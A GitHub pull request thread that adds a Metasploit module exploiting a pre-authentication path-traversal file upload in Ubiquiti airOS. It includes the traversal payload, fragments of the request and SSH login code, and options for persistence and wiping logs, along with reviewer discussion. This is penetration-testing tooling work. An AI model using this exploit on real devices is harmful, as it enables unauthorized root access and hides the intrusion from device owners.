### PR TITLE
Add Ubiquiti airOS exploit

### PR DESCRIPTION
**Pull request by wvu**
~~I'll update the description in the morning when I'm not dead.~~

**What is it?**

> airOS®5 is an advanced operating system capable of powerful wireless and routing features, built upon a simple and intuitive user interface foundation.

Basically, it's the OS for Ubiquiti airMAX (wireless stuff). I'm writing a module now because my friend had his devices hacked. :-)

**How does it work?**

The vulnerability is an authentication bypass and file upload against `login.cgi`: `Content-Disposition: form-data; name="authorized_keys"; filename="../../etc/dropbear/authorized_keys"`. You should be able to get a privileged BusyBox shell.

**Verification steps:**
- [x] Find a vulnerable device (ask me if you need help)
- [x] Fire off the exploit and see if you get a shell

### CODE REVIEW

File: modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb [hunk 1]
```diff
@@ -0,0 +1,228 @@
...
+
+    register_advanced_options([
+      OptBool.new('PERSIST_ETC', [false, 'Persist in /etc/persistent', false]),
+      OptBool.new('WIPE_LOGS',   [false, 'Wipe /var/log/messages', false]),
+      OptBool.new('SSH_DEBUG',   [false, 'SSH debugging', false]),
+      OptInt.new('SSH_TIMEOUT',  [false, 'SSH timeout', 10])
+    ])
+  end
+
+  def exploit
```
Comment (wvu-r7) [inline modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb]: **TODO:** I need to enable SSH if it's not running.

File: modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb [hunk 2]
```diff
@@ -0,0 +1,228 @@
...
+    send_request_cgi(
+      'method' => 'POST',
+      'uri'    => '/login.cgi',
+      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
+      'data'   => mime.to_s
+    )
+  end
+
+  def ssh_login
+    ssh_opts = {
```
Comment (wvu-r7) [inline modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb]: **TODO:** I need to add more stuff to this hash.

**Comment by vysec** [comment]
wooo.  Great. Is this to 6.X? The one from hackerone disclosure?

File: modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb [hunk 3]
```diff
@@ -0,0 +1,228 @@
...
+        This module exploits a pre-auth file upload to install a new root user
+        to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys.
+      },
+      'Author'             => [
+        '93c08539', # Vulnerability discovery
+        'wvu'       # Metasploit module
+      ],
+      'References'         => [
+        %w{EDB 39701},
+        %w{URL https://hackerone.com/reports/73480'}
```
Comment (void-in) [inline modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb]: Not a big deal but the closing quote should be removed.

Comment (wvu-r7) [inline modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb]: Crap, lol. Nice catch.

Comment (wvu-r7) [inline modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb]: Fixed. You have a level of pedantry that matches mine. :)

File: modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb [hunk 4]
```diff
@@ -0,0 +1,228 @@
...
+      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        Net::SSH.start(rhost, username, ssh_opts)
+      end
+    rescue Net::SSH::Exception => e
+      vprint_error("#{e.class}: #{e.message}")
+      return
+    end
+
+    if ssh
+      report_vuln(
```
Comment (wvu-r7) [inline modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb]: **TODO:** Report creds.

**Comment by void-in** [comment]
@wvu-r7 This is an excellent module. Just wanted that you take a look at the below observation regarding this PR:
```
Nice!
I didn't noted they did it.

Although depending on your infrastructure you'd prefer one that does not
overwrites the authorized_keys since that might break other
access/automation tasks the ISP might have (I think aircontrol logins
via sshkeys, nor sure though)

We took a different approach by overwriting a file that gets called from
the GUI (and without breaking it), so everything continue to work as
expected, without the need to reboot/recopy keys, passwords, etc.
```
This is from an Immunity dev. If you have the vulnerable device, can you investigate the file which might achieve the shell without overwriting the authorized_keys file?

**Comment by wvu-r7** [comment]
@void-in: This is the method malware has been using. It's far from optimal, since ```/etc/passwd``` is clobbered, too. I've been looking for a better way, specifically in ```/usr/www/*.cgi```, but I'm working on these things in my spare time... Props to Immunity for researching this more thoroughly! Thank you for the note. :)

**Comment by wvu-r7** [comment]
@void-in: I no longer have access to the device. I had to write this module overnight, and then the device was patched. Might be time to dig around in the firmware. :-)

**Comment by void-in** [comment]
@wvu-r7 You have been doing an excellent job.

**Comment by wvu-r7** [comment]
@void-in: Thank you. I am trying.

**Comment by bcook-r7** [comment]
A lot of interesting functionality in this module.

**Comment by bcook-r7** [comment]
I'm going to land this as-is, but a great follow up when you can get access again (we could probably get a couple for the lab) would be to create a module doc that includes the expected output and some background on the exploit.

**Comment by cinnamon17** [comment]
How to run with metasploit-framework?

**Comment by wvu-r7** [comment]
@cinnamon17: The same way you would with any other exploit. :)

**Pull request merged**